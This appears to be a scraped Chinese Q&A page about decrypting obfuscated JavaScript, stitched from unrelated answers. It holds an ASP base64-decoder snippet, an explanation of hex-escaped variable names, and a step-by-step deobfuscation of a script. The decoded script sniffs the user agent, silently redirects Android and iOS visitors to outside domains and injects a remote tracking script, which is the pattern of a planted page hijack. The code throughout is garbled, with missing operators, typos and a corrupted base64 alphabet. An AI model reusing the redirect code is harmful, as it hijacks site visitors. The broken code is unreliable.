js解密器apk(js解密软件)
js解密器apk(js解密软件)
在深山红叶PE工具箱里有个乱吗读取工具,假如你说的的确是,它一定可以读得出来的
webstorm可以格式化这种代码,不过代码各种变量都变成a,b,c之类的不可理解的单词了。只能自己重头看了。
%
dim conn,connstr,database,rs1,DBPath
set conn=server.CreateObject("adodb.connection")
DBPath = Server.MapPath("album.asa")
conn.open "provider=microsoft.jet.oledb.4.0; data source="DBpath
PUBLIC FUNCTION base64Decode(scrambled)
dim BASE_64_MAP_INIT
BASE_64_MAP_INIT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm-opqrstuvwxyz0123456789+/"
dim Base64EncMap(63)
dim Base64DecMap(127)
dim max, idx
max = len(BASE_64_MAP_INIT)
for idx = 0 to max - 1
Base64E-cMap(idx) = mid(BASE_64_MAP_INIT, idx + 1, 1)
next
for idx = 0 to max - 1
Base64DecMap(ASC(Base64EncMap(idx))) = idx
next
if len(scrambled) = 0 then
base64Decode = ""
exit function
end if
dim realLen
realLen = len(scrambled)
do while mid(scrambled, realLen, 1) = "="
realLen = realLen - 1
loop
dim ret, ndx, by4, first, second, third, fourth
ret = ""
by4 = (realLen \ 4) * 4
ndx = 1
do while ndx = by4
first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
third = Base64DecMap(asc(mid(scrambled, ndx+2, 1)))
fourth = Base64DecMap(asc(mid(scrambled, ndx+3, 1)))
ret = ret chr( ((first * 4) AND 255) + ((second \ 16) AND 3))
ret = ret chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
ret = ret chr( ((third * 64) AND 255) + (fourth AND 63))
ndx = ndx + 4
loop
if ndx realLen then
first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
ret = ret chr( ((first * 4) AND 255) + ((second \ 16) AND 3))
if realLen MOD 4 = 3 then
third = Base64DecMap(asc(mid(scrambled,ndx+2,1)))
ret = ret chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
end if
end if
base64Decode = ret
END FUNCTION
function Copyright()
Dim write
Dim fileSysObj, tf, read
read = "config.asp"
read = LEFT(Server.Mappath(Request.ServerVariables("PATH_INFO")), I-StrRev(Server.Mappath(Request.ServerVariables("PATH_INFO")), "\")) read
Set fileSysObj = createObject("Scripting.FileSystemObject")
IF (fileSysObj.FileExists(read)) Then
Set tf = filesysobj.OpenTextFile(read, 1)
Copyright = tf.ReadLine
tf.Close
ELSE
Copyright = "尊重作者劳动,请保留版权信息."
END IF
end fuction
%
你好,这个不用解密的,你已经解密过来了。
这是别人通过js混淆器加密后,你解密后的结果。
就是混淆器就是把一些变量替换了,可读性差,不直观。
\x69\x74\x65\x6D 这些字符都是变量的,不是真正的字符。他的这些变量就像 a b c一样,只是长度字符大。比如我们定义 a=5;以后调用a就可以,同样道理,我定义\x69\x74\x65\x6D=5,以后调用\x69\x74\x65\x6D就可以了。
要想直观的,你可以逐一替换这些变量,那要一个一个找,或者批量替换掉。
首先你的加密后的代码有误,无法执行,应将return(c35?String.fromCharCode(c+29):
修改为return(ca?"":e(parseInt(c/a)))+((c=c%a)35?String.fromCharCode(c+29):
c和35之间的部分你没复制出来
这种加密的算法的解密方法很简单
html
body
div id="test"/div
script type="text/javascript"
document.getElementById('test').innerHTML = 将需要破解的代码全部复制过来,注意你原来的代码不对,请通过替换先将上面说的那个错误改正
/script
/body
/html
将上面的代码保存成html文件,打开此文件即可看到加密前的内容,由于你的问题解密后是广告语,所以不在此处给出,自己试一下
第一步解码:
var _$ = ["\x77\x66", "\x3f", "\x26\x74\x3d\x7a\x72", '\x54\x72\x69\x64\x65\x6e\x74', '\x50\x72\x65\x73\x74\x6f', '\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74', '\x47\x65\x63\x6b\x6f', '\x4b\x48\x54\x4d\x4c', '\x41\x6e\x64\x72\x6f\x69\x64', '\x4c\x69\x6e\x75\x78', '\x69\x50\x68\x6f\x6e\x65', '\x69\x50\x61\x64', '\x53\x61\x66\x61\x72\x69', "\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x2d\x67\x6f\x6f\x67\x6c\x65\x2d\x73\x6f\x67\x6f\x75\x2d\x73\x6f\x73\x6f\x2d\x33\x36\x30\x2d\x71\x71\x2e\x6d\x61\x68\x6a\x75\x6e\x2e\x63\x6f\x6d\x2f\x63\x64\x6e\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x3f", '\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6f\x73\x2e\x61\x64\x61\x6e\x7a\x68\x75\x6f\x2e\x63\x6f\x6d\x2f\x67\x6f\x33\x2e\x70\x68\x70\x3f', '\x26\x74\x69\x64\x3d\x31\x35', "\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\'\x20\x63\x68\x61\x72\x73\x65\x74\x3d\'\x67\x62\x32\x33\x31\x32\'\x20\x73\x72\x63\x3d\'\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x73\x2e\x61\x64\x6d\x2e\x63\x6e\x7a\x7a\x2e\x6e\x65\x74\x2f\x73\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x32\x36\x37\x31\x37\x34\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"];
var a = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\x72\x63"];src = a["\x73\x70\x6c\x69\x74"](_$[1])[0x1] + _$[2];
var b = {
versions: function() {
var c = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"],
d = navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"];
return {
trident: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[3]) -0x1,
presto: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[4]) -0x1,
webKit: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[5]) -0x1,
gecko: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[6]) -0x1 c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7]) == -0x1,
mobile: !!c["\x6d\x61\x74\x63\x68"](/AppleWebKit.*Mobile.*/),
ios: !!c["\x6d\x61\x74\x63\x68"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[8]) -0x1 || c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9]) -0x1,
iPhone: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10]) -0x1,
iPad: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[11]) -0x1,
webApp: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[12]) == -0x1
}
} (),
language: (navigator["\x62\x72\x6f\x77\x73\x65\x72\x4c\x61\x6e\x67\x75\x61\x67\x65"] || navigator["\x6c\x61\x6e\x67\x75\x61\x67\x65"])["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]()
};
if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x61\x6e\x64\x72\x6f\x69\x64"] != false) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[13] + src
} else if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x68\x6f\x6e\x65"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x61\x64"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x6f\x64"] != false)) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[14] + src + _$[15]
};
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"](_$[16]);
第二步解码:
var _$ = ["wf", "?", "t=zr", 'Trident', 'presto', 'AppleWebkit', 'Gecko', 'kHTML', 'Android', 'Linux', 'iphone', 'ipad', 'Safari', 'tid=15', "script type=\'text/javascript\' charset=\'gb2312\' src=\'\'/script"
];
var a = window["document"]["getElementById"](_$[0])["src"];src = a["split"](_$[1])[0x1] + _$[2];
var b = {
versions: function() {
var c = navigator["userAgent"],
d = navigator["appVersion"];
return {
trident: c["indexOf"](_$[3]) -0x1,
presto: c["indexOf"](_$[4]) -0x1,
webKit: c["indexOf"](_$[5]) -0x1,
gecko: c["indexOf"](_$[6]) -0x1 c["indexOf"](_$[7]) == -0x1,
mobile: !!c["match"](/AppleWebKit.*Mobile.*/),
ios: !!c["match"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: c["indexOf"](_$[8]) -0x1 || c["indexOf"](_$[9]) -0x1,
iPhone: c["indexOf"](_$[10]) -0x1,
iPad: c["indexOf"](_$[11]) -0x1,
webApp: c["indexOf"](_$[12]) == -0x1
}
} (),
language: (navigator["browserLanguage"] || navigator["language"])["toLower\x43ase"]()
};
if (b["versions"]["mobile"] != false b["versions"]["android"] != false) {
window["location"]["href"] = _$[13] + src
} else if (b["versions"]["mobile"] != false (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
window["location"]["href"] = _$[14] + src + _$[15]
};
window["document"]["writeln"](_$[16]);
第三步解码
var a = document.getElementById('wf').src;
src = a.split('?')[1] + 't=zr';
var b = {
versions: function() {
var c = navigator.userAgent,
d = navigator.appVersion;
return {
trident: c.indexOf('Trident') -1,
presto: c.indexOf( 'presto') -1,
webKit: c.indexOf('AppleWebkit') -1,
gecko: c.indexOf('Gecko') -1 c.indexOf('kHTML') == -1,
mobile: !!c.match.(/AppleWebKit.*Mobile.*/),
ios: !!c.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: c.indexOf('Android') -1 || c.indexOf('Linux') -1,
iPhone: c.indexOf('iphone') -1,
iPad: c.indexOf('ipad') -1,
webApp: c.indexOf('Safari') == -1
}
} (),
language: (navigator.browserLanguage || navigator.language).toLowerCase();
};
if (b["versions"]["mobile"] != false b["versions"]["android"] != false) {
location.href = '?' + src
} else if (b["versions"]["mobile"] != false (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
location.href = '?' + src + 'tid=15'
};
document.writeln('script type=\'text/javascript\' charset=\'gb2312\' src=\'\'/script');
